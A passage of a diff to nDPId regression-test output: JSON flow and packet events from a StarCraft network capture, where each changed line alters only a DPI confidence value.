{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWdAAIAG7gbAqAFkAuQucg2aAbv4rJBeJdjU2FAUAAApXQAA"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdHrRAADkGL4UC5C5ywKgBZAG7DZfwJm7dzVFvfFAYAvbMYQAAFQMCADAisnLQsHrL1EoW2shNoX67xhkXstAI1yd6wVWuICpme1diCl2In\/GtYthhkjE1BS4="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWhAAIAG7gXAqAFkAuQucg2XAbvNUW988CZvElAUAAARFQAA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdZwtAADkG5y0C5C5ywKgBZAG7DZlWWuRU68kI6VAYAk+37QAAFQMCADBkKOWBHzDl37wozuIxUqGksDGbpGilDaRqgrJ95jL33eBT4nQmWu5qzsKHkzuYbBI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWlAAIAG7gTAqAFkAuQucg2ZAbvryQjpVlrkiVAUAAB9gwAA"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968520,"pkt":"IImEa8W6hCYVPnXECABFAABdGMVAADkGNX4C5C5owKgBZAG7DaRcpvlx40yFpFAYAi2\/cgAAFQMCADCHvY3Mj+EIqhLZWr7xkOkCQpCu81AAuIN2GL29a+w7fDrgr\/wsC4qtrqrTilg07F0="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968520,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968520,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEpAAIAGny3AqAFkAuQuaA2kAbvjTIWkXKb5plAUAADt2gAA"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABd0ZRAADkGfK4C5C5owKgBZAG7DaKE1LpjrjMv\/lAYAi2OuwAAFQMCADAOk8uVyOotmLX2HoTUFpC+IVWXwl6ab8qQjuO+KPoI4xJC+fUMLiJl2rPTnnO4+D0="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968521,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968521,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEtAAIAGnyzAqAFkAuQuaA2iAbuuMy\/+hNS6mFAUAACPfAAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAAAoCWgAADUGmrmtwnHgwKgBZAG7DZzPzdbBMZJpS1ARAXR77AAAAAAAAAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDdAAIAGrOnAqAFkrcJx4A2cAbsxkmlLz83WwlAQAP18YwAA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABdqvpAADkGo0gC5C5owKgBZAG7DaNR8ZdDlhSqVFAYAi3xwAAAFQMCADAv7rGxhq2HqkFRX8I5oUWALbAWkrPmznIlHUyodNC0DL7UHLBQOucKALsB4ikroko="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968521,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968521,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaExAAIAGnyvAqAFkAuQuaA2jAbuWFKpUUfGXeFAUAACDRwAA"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968525,"pkt":"IImEa8W6hCYVPnXECABFAABd8QVAADkGXTMC5C5ywKgBZAG7DZjX42FMOcd1YVAYArORfwAAFQMCADAnMl10t6P0LqwYwp17IIJpYKwGMbTqEggZBxrTB\/KdrEJjLBHayLFZyNZHXp1TB8c="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968525,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968525,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968525,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGW1AAIAG7gDAqAFkAuQucg2YAbs5x3Vh1+NhgVAUAADEjQAA"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968541,"pkt":"IImEa8W6hCYVPnXECABFAABdD8xAADkGPncC5C5owKgBZAG7DaEXdnI2KPa\/clAYAi2WsQAAFQMCADDEyuty98HROVf0C9dCpYEUA7Jug9PX6pMmtPtLY+MIAZP0XBy+LRgi1JBN1q929Nc="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968541,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968541,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968541,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaE5AAIAGnynAqAFkAuQuaA2hAbso9r9yF3Zya1AUAAA60gAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1437389968610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUtAAPIGObXHJqScwKgBZAG7DZ7bDuslZeBiaVAQFLnPdAAAAAAAAAAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1437389968610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUxAAPIGObTHJqScwKgBZAG7DZ7bDuslZeBiaVARFLnPcwAAAAAAAAAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1437389970671,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389970671,"pkt":"hCYVPnXEIImEa8W6CABFAAA0DEUAAIARlo\/AqAFkrcIoFtFAAbsAIKDYDBnPzxTN69maK3zVmJ1A8q4\/WcfKtlQW"} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1437389976946,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1437389976946,"pkt":"AQBeAAAWtFJ+6zOBCABGAAAoAABAAAECQqbAqAFr4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7AQEICgBN"} -00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1437389980126,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1437389980126,"pkt":"AQBeAAAWtFJ+6zOBCABGAAAoAABAAAECQqbAqAFr4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7DndzYmFj"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1437389981134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1437389981134,"pkt":"hCYVPnXEIImEa8W6CABFAAA+X2cAAIARVpXAqAFkwKgB\/s+ZADUAKjZ5W6oBAAABAAAAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1437389981164,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1437389981164,"pkt":"hCYVPnXEIImEa8W6CABFAAA+X2gAAIARVpTAqAFkwKgB\/s+ZADUAKjZ5W6oBAAABAAAAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAQ=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1437389981169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1437389981169,"pkt":"IImEa8W6hCYVPnXECABFAABOAABAAEARtezAqAH+wKgBZAA1z5kAOuq0W6qBgAABAAEAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAcAMAAEAAQAAAAYABFDvuho="} 